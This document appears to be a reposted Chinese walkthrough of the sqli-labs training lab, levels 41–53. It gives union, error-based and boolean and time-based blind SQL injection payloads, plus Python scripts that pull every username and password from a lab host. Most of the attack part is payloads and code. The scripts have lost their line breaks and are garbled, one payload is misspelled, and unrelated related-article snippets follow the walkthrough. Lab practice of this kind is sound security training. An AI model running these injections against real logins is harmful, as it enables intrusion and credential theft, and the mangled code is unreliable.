sqli.labs靶场(41-53关)

41、第四十一关

-1 union select 1,2,3--+

-1 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+

-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+

42、第四十二关

这关login_password是单引号闭合,可用布尔盲注

123'+or+1=1--+ 

上脚本爆库:

import stringimport requestsnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]if __name__ == '__main__':test = True# 获取正确返回内容长度url = "http://sqli.labs/Less-42/login.php"list1 = numbers + letters2 + fuhao# 获取数据库名database = ""num = 0print(f"数据库:")for p in range(50):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})if len(res.text) == 1580:database = f"{database}{a}"print(a, end='')num = 0print("")# 获取所有表名num = 0tables = ""print(f"所有表名:")for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:tables = f"{tables}{a}"print(a, end='')num = 0print("")# 获取users表所有字段columns = ""print(f"users表所有字段名:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:columns = f"{columns}{a}"print(a, end='')num = 0print("")  # 换行# 获取所有账号users = ""print(f"所有用户密码:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password":  f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:users = f"{users}{a}"print(a, end='')num = 0

43、第四十三关

这关是POST请求,login_password参数单引号加括号闭合

POC:111')--+,有报错信息,可以用报错注入

111')+and+extractvalue(1,concat(0x7e,database(),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users),0x7e))--+

44、第四十四关

POST请求,login_password参数单引号闭合

可以用布尔盲注,POC:123'+or+lenth(database())=1--+

这个脚本注入比较方便

import stringimport requestsnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]if __name__ == '__main__':test = True# 获取正确返回内容长度url = "http://sqli.labs/Less-44/login.php"list1 = numbers + letters2 + fuhao# 获取数据库名database = ""num = 0print(f"数据库:")for p in range(50):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})if len(res.text) == 1580:database = f"{database}{a}"print(a, end='')num = 0print("")# 获取所有表名num = 0tables = ""print(f"所有表名:")for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:tables = f"{tables}{a}"print(a, end='')num = 0print("")# 获取users表所有字段columns = ""print(f"users表所有字段名:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:columns = f"{columns}{a}"print(a, end='')num = 0print("")  # 换行# 获取所有账号users = ""print(f"所有用户密码:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password":  f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:users = f"{users}{a}"print(a, end='')num = 0

45、第四十五关

这关是login_password参数单引号加括号闭合

可以使用布尔盲注POC:123')+or+substr(database(),1,1)='a'--+

脚本爆库

import stringimport requestsnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]if __name__ == '__main__':test = True# 获取正确返回内容长度url = "http://sqli.labs/Less-45/login.php"list1 = numbers + letters2 + fuhao# 获取数据库名database = ""num = 0print(f"数据库:")for p in range(50):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})if len(res.text) == 1580:database = f"{database}{a}"print(a, end='')num = 0print("")# 获取所有表名num = 0tables = ""print(f"所有表名:")for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user" : "admin", "login_password": f"123') or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:tables = f"{tables}{a}"print(a, end='')num = 0print("")# 获取users表所有字段columns = ""print(f"users表所有字段名:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:columns = f"{columns}{a}"print(a, end='')num = 0print("")  # 换行# 获取所有账号users = ""print(f"所有用户密码:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:num += 1res = requests.post(url, {"login_user": "admin", "login_password":  f"123') or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})if len(res.content) == 1580:users = f"{users}{a}"print(a, end='')num = 0

46、第四十六关

参数是sort

4+and+extractvalue(1,concat(0x7e,database()))

4+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

4+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ))

47、第四十七关

sort=1

sort=2

sort=3

sort=4

应该是报错了,一共三个字段,不显示错误可以用时间盲注

48、第四十八关

和上一关差不多,这关单引号闭合

还是要时间盲注

脚本

import string
from time import time, sleepimport requestsnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]if __name__ == '__main__':test = True# 获取正确返回内容长度url = "http://sqli.labs/Less-48/?sort=1%20"list1 = numbers + letters2 + fuhao# 获取数据库名database = ""num = 0print(f"数据库:")for p in range(50):if num > len(list1) * 2:breakfor a in list1:num += 1url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)"stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:database = f"{database}{a}"print(a, end='')num = 0print("")# 获取所有表名num = 0tables = ""print(f"所有表名:")for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:tables = f"{tables}{a}"print(a, end='')num = 0print("")# 获取users表所有字段columns = ""print(f"users表所有字段名:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:columns = f"{columns}{a}"print(a, end='')num = 0print("")  # 换行# 获取所有账号users = ""print(f"所有用户密码:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:users = f"{users}{a}"print(a, end='')num = 0

49、第四十九关

和48关差不多,也是时间盲注,需要单引号闭合

上脚本

import string
from time import time, sleepimport requestsnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]if __name__ == '__main__':test = True# 获取正确返回内容长度url = "http://sqli.labs/Less-49/?sort=1%27%20"list1 = numbers + letters2 + fuhao# 获取数据库名database = ""num = 0print(f"数据库:")for p in range(50):if num > len(list1) * 2:breakfor a in list1:num += 1url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:database = f"{database}{a}"print(a, end='')num = 0print("")# 获取所有表名num = 0tables = ""print(f"所有表名:")for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:tables = f"{tables}{a}"print(a, end='')num = 0print("")# 获取users表所有字段columns = ""print(f"users表所有字段名:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:columns = f"{columns}{a}"print(a, end='')num = 0print("")  # 换行# 获取所有账号users = ""print(f"所有用户密码:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:users = f"{users}{a}"print(a, end='')num = 0

50、第五十关

有报错信息,试一下报错注入

sort=10+and+extractvalue(1,concat(0x7e,database()))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))

51、第五十一关

有报错信息,还得报错注入,单引号闭合

sort=3'+and+extractvalue(1,concat(0x7e,database()))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))--+

52、第五十二关

没有报错信息,得用盲注,时间盲注

上脚本

import string
from time import time, sleepimport requestsnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]if __name__ == '__main__':test = True# 获取正确返回内容长度url = "http://sqli.labs/Less-52/?sort=1%20"list1 = numbers + letters2 + fuhao# 获取数据库名database = ""num = 0print(f"数据库:")for p in range(50):if num > len(list1) * 2:breakfor a in list1:num += 1url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:database = f"{database}{a}"print(a, end='')num = 0print("")# 获取所有表名num = 0tables = ""print(f"所有表名:")for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:tables = f"{tables}{a}"print(a, end='')num = 0print("")# 获取users表所有字段columns = ""print(f"users表所有字段名:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:columns = f"{columns}{a}"print(a, end='')num = 0print("")  # 换行# 获取所有账号users = ""print(f"所有用户密码:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 13:users = f"{users}{a}"print(a, end='')num = 0

53、第五十三关

单引号闭合,没有报错,还得是盲注

上脚本

import string
from time import time, sleepimport requestsnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]if __name__ == '__main__':test = True# 获取正确返回内容长度url = "http://sqli.labs/Less-53/?sort=22%27%20"list1 = numbers + letters2 + fuhao# 获取数据库名database = ""num = 0print(f"数据库:")for p in range(50):if num > len(list1) * 2:breakfor a in list1:num += 1url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 5:database = f"{database}{a}"print(a, end='')num = 0print("")# 获取所有表名num = 0tables = ""print(f"所有表名:")for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 5:tables = f"{tables}{a}"print(a, end='')num = 0print("")# 获取users表所有字段columns = ""print(f"users表所有字段名:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 5:columns = f"{columns}{a}"print(a, end='')num = 0print("")  # 换行# 获取所有账号users = ""print(f"所有用户密码:")num = 0for p in range(1000):if num > len(list1) * 2:breakfor a in list1:url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"num += 1stime = time()  # 记录开始时间res = requests.get(url_db)etime = time()  # 记录结束时间if etime - stime > 5:users = f"{users}{a}"print(a, end='')num = 0

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/453654.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

安泰功率放大器的技术指标有什么

安泰功率放大器的技术指标有什么

功率放大器是一种电子设备,用于将输入信号的功率增加到更高的水平。以下是功率放大器的一些常见技术指标: 增益:增益是功率放大器将输入信号放大的程度。它通常以分贝(dB)为单位来表示,例如20dB。增益值越高…
阅读更多...
Failed at the chromedriver@2.27.2 install script.

Failed at the chromedriver@2.27.2 install script.

目录 【错误描述】Failed at the chromedriver2.27.2 install script. npm install报的错误 【解决方法】 删除node_modules文件夹npm install chromedriver --chromedriver_cdnurlhttp://cdn.npm.taobao.org/dist/chromedrivernpm install 【未解决】 下载该zip包运行这个&…
阅读更多...
Fink CDC数据同步(五)Kafka数据同步Hive

Fink CDC数据同步(五)Kafka数据同步Hive

6、Kafka同步到Hive 6.1 建映射表 通过flink sql client 建Kafka topic的映射表 CREATE TABLE kafka_user_topic(id int,name string,birth string,gender string ) WITH (connector kafka,topic flink-cdc-user,properties.bootstrap.servers 192.168.0.4:6668…
阅读更多...
何时以及如何选择制动电阻

何时以及如何选择制动电阻

制动电阻的选择是优化变频器应用的关键因素 制动电阻器在变频器中是如何工作的? 制动电阻器在 VFD 应用中的工作原理是将电机减速到驱动器设定的精确速度。它们对于电机的快速减速特别有用。制动电阻还可以将任何多余的能量馈入 VFD,以提升直流母线上的…
阅读更多...
从0开始搭建、上传npm包

从0开始搭建、上传npm包

从0开始搭建、上传npm包 1、上传一个简单获取水果价格的包创建 vite 项目在项目根目录 src 文件夹中创建 index.ts 文件,文件内容如下:在 main.ts 文件中导入、导出上面创建的方法创建 vite.config.ts 配置文件,文件内容如下配置 package.jso…
阅读更多...
Container 命令ctr、crictl 命令

Container 命令ctr、crictl 命令

1、 Containerd和Docker的架构区别 Docker vs. Containerd: 2、ctr & crictl的区别 ctr是containerd的一个客户端工具 crictl 是 CRI 兼容的容器运行时命令行接口,可以使用它来检查和调试 Kubernetes 节点上的容器运行时和应用程序 crictl 则直接对…
阅读更多...
运维自动化bingo前端

运维自动化bingo前端

项目目录结构介绍 项目创建完成之后,我们会看到bingo_web项目其实是一个文件夹,我们进入到文件夹内部就会发现一些目录和文件,我们简单回顾一下里面的部分核心目录与文件。 ├─node_modules/ # node的包目录,项目运行的依赖包…
阅读更多...
马尔科夫链--基础知识

马尔科夫链--基础知识

马尔可夫链(Markov Chain)是一种数学系统,它经过从一个状态到另一个状态的转换,这些转换遵循马尔可夫性质,即未来的状态只依赖于当前的状态,而与过去的状态(即如何到达当前状态)无关…
阅读更多...
《Python 网络爬虫简易速速上手小册》第1章:Python 网络爬虫基础(2024 最新版)

《Python 网络爬虫简易速速上手小册》第1章:Python 网络爬虫基础(2024 最新版)

文章目录 1.1 网络爬虫简介1.1.1 重点基础知识讲解1.1.2 重点案例:社交媒体数据分析1.1.3 拓展案例1:电商网站价格监控1.1.4 拓展案例2:新闻聚合服务 1.2 网络爬虫的工作原理1.2.1 重点基础知识讲解1.2.2 重点案例:股票市场数据采…
阅读更多...
1802907-97-6,炔基PEG5甲基四嗪,具有良好的水溶性和生物相容性

1802907-97-6,炔基PEG5甲基四嗪,具有良好的水溶性和生物相容性

您好,欢迎来到新研之家 文章关键词:1802907-97-6,甲基四嗪-五聚乙二醇-炔,甲基四嗪-五聚乙二醇-炔基,炔基PEG5甲基四嗪,Methyltetrazine-PEG5-alkyne ,Alkyne-PEG5-Methyltetrazine 一、基本信…
阅读更多...
WebChat——一个开源的聊天应用

WebChat——一个开源的聊天应用

Web Chat 是开源的聊天系统,支持一键免费部署私人Chat网页的应用程序。 开源地址:https://github.com/loks666/webchat 目录树 TOC 👋🏻 开始使用 & 交流🛳 开箱即用 A 使用 Docker 部署B 使用 Docker-compose…
阅读更多...
人工智能福利站,初识人工智能,图神经网络学习,第一课

人工智能福利站,初识人工智能,图神经网络学习,第一课

🏆作者简介,普修罗双战士,一直追求不断学习和成长,在技术的道路上持续探索和实践。 🏆多年互联网行业从业经验,历任核心研发工程师,项目技术负责人。 🎉欢迎 👍点赞✍评论…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023